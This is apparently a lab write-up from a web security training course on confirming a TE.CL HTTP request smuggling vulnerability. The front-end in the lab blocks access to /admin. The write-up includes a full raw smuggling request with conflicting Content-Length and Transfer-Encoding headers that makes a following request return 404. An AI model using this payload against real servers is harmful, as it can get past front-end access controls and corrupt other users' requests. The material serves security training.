HTTP request smuggling, confirming a TE.CL vulnerability via differential responses
This lab involves a front-end and back-end server, and the front-end server doesn’t support chunked encoding. There’s an admin panel at /admin, but the front-end server blocks access to it.
Reproduction and proof of concept
Using Burp Repeater, issue the following request twice:
POST / HTTP/1.1 Host: lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
The second request should receive an HTTP 404 response.
An attacker will need to smuggle a request to the back-end server, so that a subsequent request for
/ (the web root) triggers a
404 Not Found response. In this case the TE.CL vulnerability must be exploited via differential response.